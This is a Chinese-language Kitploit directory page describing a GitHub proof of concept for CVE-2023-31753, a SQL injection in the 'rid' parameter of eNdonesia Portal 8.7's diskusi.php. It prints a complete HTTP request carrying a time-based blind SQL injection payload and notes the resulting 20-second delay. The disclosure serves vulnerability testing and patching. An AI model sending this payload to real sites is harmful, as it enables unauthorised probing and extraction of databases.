Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-31753 — CVE-2023-31753的概念验证 - eNdonesia Portal 8.7 | Kitploit
工具/GitHubGitHub/kil0byt3x/cve-2023-31753
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubkil0byt3x/cve-2023-31753

CVE-2023-31753

CVE-2023-31753的概念验证 - eNdonesia Portal 8.7

查看仓库
23年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-31753 的概念验证

描述:在 eNdonesia Portal v8.7 中发现了一个 SQL 注入漏洞,通过在 diskusi.php 的 "rid" 参数中插入精心构造的有效载荷可加以利用。

  • 漏洞标题:eNdonesia Portal 8.7 - diskusi.php 中的 SQL 注入漏洞(rid 参数)
  • 日期:2023年5月19日
  • 漏洞作者:Kunal Khubchandani
  • 厂商主页:http://www.endonesia.org/
  • 软件链接:https://sourceforge.net/projects/endonesia/
  • 版本:8.7
  • 类别:Web 应用
  • 测试环境:WiN11_x64/KaLiLinuX_x64
  • CVE:CVE-2023-31753

#POC:

  1. 要利用此漏洞,需在以下 HTTP 请求中将 SQLi 延时有效载荷作为 "rid" GET 参数的值发送。

  2. 存在漏洞的请求:

GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select*from(select(sleep(20)))a) HTTP/1.1
Host: TARGET
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Connection: close
Cache-Control: max-age=0

  1. 通过 Burp Suite 发送上述 HTTP 请求后,用户将收到一个 20 秒的延迟响应。

** 20秒延迟:

image

** 30秒延迟:

image

下载工具